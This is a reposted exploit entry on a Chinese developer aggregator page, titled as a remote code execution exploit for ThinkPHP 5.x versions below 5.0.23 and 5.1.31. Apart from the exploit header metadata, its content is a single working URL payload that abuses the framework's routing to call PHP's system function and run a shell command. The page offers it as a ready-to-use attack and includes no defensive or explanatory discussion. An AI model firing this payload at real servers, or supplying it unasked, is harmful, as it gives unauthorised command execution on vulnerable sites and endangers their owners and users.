首页 > Web开发 > 详细

[EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

时间:2019-03-14 22:05:39      阅读:304      评论:0      收藏:0      [点我收藏+]
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A

# Exploit

http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20‘phpinfo();‘
            

 

[EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

原文:https://www.cnblogs.com/k8gege/p/10533677.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!